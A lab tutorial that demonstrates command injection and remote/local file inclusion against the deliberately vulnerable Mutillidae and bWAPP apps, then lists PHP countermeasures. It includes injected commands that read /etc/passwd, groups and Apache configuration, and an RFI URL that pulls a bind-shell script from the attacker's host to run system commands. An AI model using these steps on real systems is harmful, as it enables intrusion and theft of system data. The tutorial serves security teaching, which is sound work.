Practical Demonstration of Command Injection, LFI, and RFI Vulnerabilities in OWASP and Possible Countermeasures to Mitigate Them

Command Injection

We access OWASP Mutillidae.

Click on "OWASP 2013 AI - injection (other) Command InjectionDns lookup".

We use the command pwd to find out the current directory.

The list of users from the /etc/passwd file is obtained.

With the command ls -la, we can list all files and hidden files in the current directory.

The files in the /etc/apache2/ directory are listed.

With the command grep -i '(postgres | sql|db2|ora)', it checks if any user named postgres, sql, db2, or ora exists.

With the command ps -eaf | egrep -i '(postgres | sql | db2 | ora)', it checks if there are active processes with those names and in which directory.

All active modules that Apache contains are listed.

All available modules that Apache contains are listed.

Countermeasures for Command Injection

• First countermeasure: Validate against a whitelist of allowed values.
• Second countermeasure: Validate the input to be a number.
• Third countermeasure: Validate that the input contains only alphanumeric characters, without other syntax or whitespace (example: <?php echo 'hi'; ?>).
• Fourth countermeasure: Whenever possible, use built-in functions instead of operating system commands (example: unlink($file)).
• Fifth countermeasure: Use filter_input. Example: <?php if ($targetIP = filter_input(INPUT_GET,'ip',FILTER_VALIDATE_IP)) { $cmd = exec( "ping $target" ); } else { die("Please provide a valid IP address"); }?>.
• Sixth countermeasure: Avoid using exec(), shell_exec(), system(), passthru().
• Seventh countermeasure: Avoid using strip_tags() for sanitization.

LFI/RFI

To exploit the LFI/RFI vulnerability, we navigate to the "bwapp" machine and select "Remote & Local File Inclusion (RFI/LFI)" from the dropdown.

We start the command injection to obtain system information. By going to the /etc/hostname directory, we get the machine's name.

All users in the /etc/passwd file are listed.

System groups are listed from the /etc/group file.

In the /etc/apache2/apache2.conf file, you can see the Apache configuration.

We activate Apache on our Kali machine to inject and display our Apache in the URL.

Bindshell

A bindshell is created to execute commands on the OWASP machine.

The PHP code is included in the URL: 10.0.2.4/bWAPP/rlfi.php?language=http://10.0.2.7/bind.shell.txt&action=go&comando=ls.

Through the shell, system commands are used to obtain information.

ls is used to list the files in the current directory.

The ps command is used to display all active processes on the vulnerable machine.

With the lshw command, a list of all detected hardware components is displayed.

The lsmod command shows the status of kernel modules.

The lspci command displays a list of the PCI devices on the system.

The w command shows active users on the system and what they are running.

lsof shows the files that a process has open in order to execute.

RFI/LFI Countermeasures

• First countermeasure: Disable the functions allow_url_include=off and allow_url_fopen=off in php.ini. The first allows access to open remote files, and the second allows access to remote files using require or include instructions.
• Second countermeasure: Restrict folders with write permissions to prevent the upload of malicious files.
• Third countermeasure: Use predefined conditions as an alternative to file names when file inclusion is based on user input.